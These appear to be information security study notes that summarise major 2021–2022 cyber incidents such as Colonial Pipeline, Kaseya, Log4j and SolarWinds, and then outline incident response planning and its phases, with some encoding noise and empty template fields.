Title
Details
Microsoft Exchange Server hack (2021)
Description: ; Impact: ; Attribution:
Four zero-day vulnerabilities in Microsoft Exchange Server software were exploited to gain access to email accounts. Hackers deployed web shells to maintain persistent access and control over the compromised servers.]
Impact: At least 30,000 employees in the United States and potentially hundreds of thousands worldwide were affected, including organisations, local governments and educational institutions.; Attribution:
Attribution: �Microsoft attributed the attack to Hafnium, a group believed to operate from China with state sponsorship, indicating a high level of resources and co-ordination.
Colonial Pipeline ransomware attack (2021)
Description: DarkSide ransomware gang used compromised login credentials to access Colonial Pipeline ��s network. The ransomware encrypted data and demanded a ransom for decryption keys.; Impact: The pipeline, responsible for transporting 45 per cent of the US ��s east coast fuel, shut down for several days, leading to fuel shortages, panic buying and price spikes. Colonial Pipeline paid a US$4.4 million ransom, although a portion was later recovered by the FBI.; Attribution: DarkSide is a cybercriminal group believed to operate out of Eastern Europe, possibly Russia. The group ��s tactics and the focus on financial gain are characteristic of organised cybercrime.
JBS Foods ransomware attack (2021)
Description: �JBS USA, part of the world ��s largest meat processing company, faced a ransomware attack that encrypted files and disrupted operations in North America and Australia.
Impact: �The attack led to a temporary shutdown of JBS facilities, causing significant disruptions in the meat supply chain. JBS paid US$11 million in ransom to REvil to regain access to their systems.
Attribution: �REvil (also known as Sodinokibi), a notorious ransomware group with ties to Russia, claimed responsibility. The attack demonstrated the vulnerabilities in critical food supply infrastructure.
Kaseya VSA ransomware attack (2021)
Description: REvil exploited vulnerabilities in Kaseya ��s VSA software, which is used by MSPs. This allowed the ransomware to spread to MSPs �� customers, leading to a widespread impact.
Impact: �Up to 1,500 organisations were affected, with systems encrypted and demands for ransom payments. The attack highlighted the risks associated with supply chain vulnerabilities in IT management software.
Attribution: �REvil, consistent with their previous attacks, demanded significant ransoms and caused extensive disruption, leveraging the interconnected nature of MSPs and their clients.
Facebook data breach (2021)
Description: Personal data of more than 533 million Facebook users from 106 countries was leaked online. The data included phone numbers, Facebook IDs, full names, locations, birthdates, bios and, in some cases, email addresses.;
Impact: �Although the data breach occurred in 2019, the data resurfaced in 2021, making it readily available on hacking forums. This raised significant privacy concerns and potential risks for identity theft and targeted phishing attacks.
Attribution: �The breach resulted from a vulnerability in Facebook ��s ��Add Friend �� feature, which allowed for automated scraping of user profiles. While specific attackers were not identified, the incident underscores the risks of data scraping.
T-Mobile data breach (2021)
Description: �Hackers gained access to T-Mobile ��s systems, stealing personal data of more than 40 million current and prospective customers. The breach included sensitive information such as names, dates of birth, social security numbers and drivers �� licence details.
Impact: �The breach exposed a significant volume of sensitive personal information, potentially leading to identity theft and fraud. T-Mobile faced criticism over their security practices and response to the breach.
Attribution: �A hacker claimed responsibility and offered the data for sale on a dark web forum. The breach highlighted vulnerabilities in T-Mobile ��s data security protocols.
Log4j vulnerability exploitation (2021 ��2022)
Description: �The Log4j logging library, widely used in Java applications, had a critical vulnerability (CVE-2021-44228) that allowed remote code execution. Attackers could exploit this flaw by sending a specially crafted request to affected servers.
Impact: �The vulnerability, known as Log4Shell, had a vast impact due to the widespread use of Log4j. It affected a large number of applications and services, with exploitation attempts reported globally. Organisations scrambled to patch the vulnerability and mitigate risks.
Attribution: While the vulnerability itself was a flaw in the software, various threat actors, including state-sponsored groups and cybercriminals, quickly moved to exploit it. The widespread and rapid exploitation underscored the critical nature of the vulnerability.
Crypto.com �hack (2022)
Description: �Hackers bypassed �Crypto.com ��s two-factor authentication system, stealing approximately US$34 million in Bitcoin and Ethereum from user accounts.
; Impact: Around 500 user accounts were affected, leading to significant financial losses. �Crypto.com �reimbursed affected users and implemented additional security measures.;
Attribution: �Specific attackers were not publicly identified. The breach highlighted vulnerabilities in cryptocurrency exchange security, particularly around MFA systems.
Okta security breach (2022)
Description: �Hackers gained access to Okta ��s internal system through a third-party contractor, potentially compromising thousands of Okta customers who rely on the company ��s authentication services.
Impact: �The breach raised concerns about the security of IAM services provided by Okta, affecting the trust and security posture of its customers.
Attribution: �The Lapsus$ group claimed responsibility for the breach. Lapsus$ is known for targeting large tech companies and exploiting vulnerabilities in third-party services to gain access.
IR
INCIDENT RESPONSE
IR is used to describe the process that an organisation uses in response to an incident. It is a structured approach to handling and managing the aftermath of an incident to reduce damage and recovery time and costs. The incident can be anything from a power outage, severe weather or fire to a data breach or cyber-attack. Each incident needs to be managed effectively to reduce the impact and harm to the organisation. With the greater reliance on information processes and systems. If these are disrupted the financial and reputational damage can be huge.
SolarWinds incident in December 2020.
This incident impacted five of the seven African local markets I was supporting cybersecurity-wise for a global company. They were not attacked directly, but had software that required patching quickly due to a vulnerability, as well as undertaking a check for any IoCs. My role was to ensure systems were patched and a check for IoCs was performed, working with stakeholders at a local and senior level. What was also interesting was that, as soon as the vulnerability was known about, there was a huge increase in external scans looking for it.
The SolarWinds attack was a sophisticated supply chain cyber operation, conducted by APT29,
The SolarWinds attack was a sophisticated supply chain cyber operation, conducted by APT29, also known as Cozy Bear, and attributed to Russia ��s Foreign Intelligence Service. The compromise was discovered in December 2020. Cozy Bear had created customised malware and injected it into the SolarWinds Orion software build process. This was then distributed by a software update process unbeknown that it contained malware. As well as the malware, they used token theft, password spraying, spear phishing and API abuse along with other supply chain attacks to compromise user accounts to gain access. The US government assessed that, of the approximately 18,000 affected public and private sector customers of SolarWinds �� Orion, only a very small number were compromised with activity from Cozy Bear on their systems.
NIST 800-61 definition of an incident is:
NIST 800-61 definition of an incident is: ‘A security incident is the act of violating an explicit or implied security policy.
An organisation should have an IR plan in place which…
clearly defines what an incident is with a guided process to follow in order to ascertain the severity of the incident and required response
The need for an effective IR and management is often driven by change. Some of the trends and increased occurrences that can lead to changes are:
a rise in information security incidents and losses such as ransomware;
vulnerabilities in hardware and software;
control failure;
legal and regulatory changes;
lack of security, with poorly managed IT;
threat actor capability growing.
IR plan must be supported…
the first step in IR
by policy and procedure
first step in IR plan is revisiting other information security policies to ensure up to date or fit for purpose and built on solid foundations
A typical IR plan may include the following:
mission;
strategies and goals;
organisation response to IR;
triage and trigger for different IR levels;
key decision-making employee and responsibilities;
communication with the rest of the organisation and third parties or customers;
an ability to measure the IR;
capability and its effectiveness;
lessons learnt for ongoing IR improvement;
capability;
senior management approval.
CERT
The preparation phase is perhaps the most important phase. Here the development of an IR plan and what is often called a computer emergency response team (CERT) is put together and trained The goal is to ensure the organisation has the people, tools, policies and plans to respond to an incident. The plan cannot be considered implemented unless it has been tested.
The next phase is the detection of an incident; it could be just IoC, intrusion or a full blown cyber-attack. The sooner you can detect the sooner you can respond. A very important part is to check that it is an incident and not a false positive from a system failure or incorrect alerts. It is here where having monitors, vulnerability scanning, IDSs and log and network traffic analysis in place will help get quick visibility and therefore response. With detection you also need to be able to undertake further analysis to determine the required response.
Monitoring: �Ongoing monitoring to detect any signs of residual issues or new attacks.
Description: ; Impact: ; Attribution:
Table 8.1 Basic prioritisation of incidents by severity of attacks (ENISA)
Description: ; Impact: ; Attribution:
Attack
Description: ; Impact: ; Attribution:
Organisations must understand their responsibility for notification of a breach following local law and regulation.
Description: ; Impact: ; Attribution:
-
1 INFORMATION SECURITY PRINCIPLES139
-
2 INFORMATION RISK142
-
ABBREVIATIONS238
-
GLOSSARY128
-
3 INFORMATION SECURITY FRAMEWORKS244
-
4 SECURITY OPERATIONS280
-
5 SECUIRITY LIFECYLCE AND DEVSECOPS107
-
6 TECHNICAL SECURITY253
-
7 PHYSICAL AND ENVIRONMENTAL SECURITY28
-
8 DISASTER RECOVERY AND DIGITAL FORENSICS99
-
9 EMERGING TECHNOLOGIES113
-
Specimen20
-
Misc Qs20
-
AI questions22
-
chapter 889
